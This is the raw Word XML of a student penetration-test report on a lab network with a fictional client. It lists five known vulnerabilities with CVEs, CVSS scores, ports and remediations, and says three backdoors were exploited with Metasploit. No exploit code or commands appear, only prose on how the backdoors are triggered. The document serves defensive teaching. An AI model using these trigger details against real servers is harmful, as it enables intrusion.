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20" w:before="120" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato Black" w:cs="Lato Black" w:eastAsia="Lato Black" w:hAnsi="Lato Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Lato Black" w:cs="Lato Black" w:eastAsia="Lato Black" w:hAnsi="Lato Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="ffd966" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DISCLAIMER</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Lato Black" w:cs="Lato Black" w:eastAsia="Lato Black" w:hAnsi="Lato Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Assessment was part of a simulated environment.  ALL IPs shown are within a private, isolated, virtual lab environment. and do not correspond to any real world systems or networks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:spacing w:after="120" w:before="120" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato Black" w:cs="Lato Black" w:eastAsia="Lato Black" w:hAnsi="Lato Blac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20" w:before="120" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Assessment Report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sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PenTest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ambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PT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Dunder Mifflin Paper Co.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|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|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FICTVS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Agency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[</w:t>
      </w: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5/11/2025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]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="center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Rule="auto"/>
        <w:jc w:val="center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Rule="auto"/>
        <w:jc w:val="center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Rule="auto"/>
        <w:jc w:val="center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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared by:</w:t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Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Thomas Halczak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Devin Chandler</w:t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Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Roniel Bailon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria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0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="36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0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="36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Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1886417878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660"/>
              <w:tab w:val="right" w:leader="none" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100" w:before="0" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            <w:jc w:val="righ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jposot8cpv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</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Executive Summary</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">1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796"/>
            </w:tabs>
            <w:spacing w:after="100" w:before="0" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="1170" w:right="0" w:hanging="95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2re7e48l7e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</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Overview</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">1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796"/>
            </w:tabs>
            <w:spacing w:after="100" w:before="0" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="1170" w:right="0" w:hanging="95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51syc2rkw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</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Scope</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">1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796"/>
            </w:tabs>
            <w:spacing w:after="100" w:before="0" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="1170" w:right="0" w:hanging="95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x5f1vd6o5u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</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Assessment Summary</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">2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796"/>
            </w:tabs>
            <w:spacing w:after="100" w:before="0" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="1170" w:right="0" w:hanging="95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gmnzyipn3e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1.3.1.</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Deficiencies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796"/>
            </w:tabs>
            <w:spacing w:after="100" w:before="0" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="1170" w:right="0" w:hanging="950"/>
            <w:jc w:val="left"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_jylxd7eyn5g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1.3.2.</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Remediations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9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wlcymmg1l4ui" w:id="0"/>
      <w:bookmarkEnd w:id="0"/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Appendix –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Technical Test Report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="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr/>
        <w:sectPr>
          <w:headerReference r:id="rId6" w:type="first"/>
          <w:footerReference r:id="rId7" w:type="first"/>
          <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
          <w:pgMar w:bottom="1440" w:top="1440" w:left="994" w:right="1440" w:header="720" w:footer="820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1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jposot8cpvo1" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="702" w:hanging="432"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i2re7e48l7eb" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  Overview</w:t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Devin Chandler, Thomas Halczak, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Roniel Bailon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conducted a Security Assessment of the Penetration Test Lab Network (PTLN) for the purposes of a classroom-based cybersecurity exercise. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment was conducted from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">May 9, 2025</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">May 13, 2025</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, following practical penetration testing methodology using Nmap, Metasploit, and other industry-standard tools. No formal Security Assessment Plan (SAP) was used.</w:t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findings were documented and reviewed internally by the assessment team. All verified vulnerabilities were included in this report, and a risk level was assigned to each based on CVSS scoring standards. Three vulnerabilities (vsFTPd 2.3.4 Backdoo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">r, Samba remote code execution, and UnrealiRCd 3.2.8.1 Backdoor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) were successfully exploited, resulting in root-level system access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk ratings are based on base CVSS scores and informed by exploitability, potential impact, and mitigation options within the lab environment.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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="702" w:hanging="432"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k51syc2rkwn" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  Scope</w:t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scope of this security assessment was limited to a simulated lab environment provided by CyberLabs, consisting of a Kali Linux attacker machine and several target systems, including Metasploitable 2 and Windows Server 2020.</w:t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assessment focused exclusively on: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Discovering network services and open ports</w:t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Identifying common vulnerabilities</w:t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Exploiting at least one vulnerability for demonstration purposes</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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No systems outside the assigned lab environment were tested. The scope was designed to mimic a small enterprise network for educational purposes.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3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62625" cy="3248025"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="702" w:hanging="432"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gx5f1vd6o5uv" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  Assessment Summary </w:t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security assessment was conducted in a lab-based environment simulating a basic internal network. The assessment targeted vulnerable systems using Kali Linux as the attack platform.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A total of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5 vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> were identified across multiple services and protocols. Of those, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3 vulnerabilities were successfully exploited</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Metasploit, resulting in root access to the machine without authentication.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>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List the deficiencies and remediation efforts by technology and component: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numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1224" w:hanging="144.00000000000006"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6gmnzyipn3e5" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deficiencies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:ind w:left="1440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Auditing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2304" w:right="0" w:hanging="36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highlight w:val="yellow"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  SSL POODLE information leak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2304" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left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CVE-2014-3566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2304" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left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CVSS Score: 3.4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2304" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left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Service Port: 5432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2304" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left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Man in the middle attack which leverages POODLE(Padding Oracle On Downgraded Legacy Encryption) to allow for the decrypting of the SSL sessions/access by downgrading the security standard used while the connection is being established.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2304" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left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2304" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. UnrealiRCd 3.2.8.1 Backdoor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2304" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left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CVE-2010-2075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2304" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left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CVSS Score: 10.0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2304" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left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Service Port: 6667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2304" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left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Version of UnrealiRCd server with malicious backdoor allowing remote attackers to execute commands</w:t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ind w:left="2304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3. Samba remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:ind w:left="2304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CVE-2007-2447</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:ind w:left="2304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CVSS Score: 7.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:ind w:left="2304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Service Port: 445</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:ind w:left="2304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Allows remote attackers to execute commands on the server by injecting shell commands through usernames.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2304" w:hanging="36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4. ssl-ccs-injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:ind w:left="2304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CVE-2014-0224</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:ind w:left="2304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CVSS Score: 7.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:ind w:left="2304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Service Port: 5432</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:ind w:left="2304" w:firstLine="0"/>
        <w:rPr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OpenSSL vulnerability which allows an attacker to send a ChangeCipherSpec message during a man in the middle attack, starting a new session with a zero length key(no key). This attack allows easy eavesdropping by an attacker as the session is not effectively unencrypted.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ind w:left="2304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5. vsFTPd 2.3.4 Backdoor Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:ind w:left="2304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CVE-2011-2523</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:ind w:left="2304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CVSS Score: 10.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:ind w:left="2304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Service Port: 21</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:ind w:left="2304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Version of vsFTPd distributed with a malicious back door in the source code. A user logging on with a username containing :), the server opens a command shell on port 6200 granting root access.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2304" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left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numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1224" w:hanging="144.00000000000006"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jylxd7eyn5gz" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:ind w:left="1440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Auditing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vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IBM recommends disabling SSLv3 to resolve this vulnerability, however they advise making sure this does not cause any compatibility issues.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800" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate removal of the compromised version of UnrealiRCd (3.2.8.1), replacing it with a verified clean version.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800" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade to Samba version 3.0.25 or later.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800" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redhat recommends updating to the latest version of OpenSSL  and restart any services that depend on it.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800" w:right="0" w:hanging="360"/>
        <w:jc w:val="left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Immediate upgrade to a secure version of vsFTPd. Consider replacing FTP with an alternative file transfer method such as SFTP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9aul89kgg8r9" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendices Descriptions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1mfsf457vssl" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference the appendices below for detailed assessment information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId9" w:type="default"/>
          <w:footerReference r:id="rId10" w:type="default"/>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
          <w:pgMar w:bottom="1440" w:top="1440" w:left="994" w:right="1440" w:header="720" w:footer="432"/>
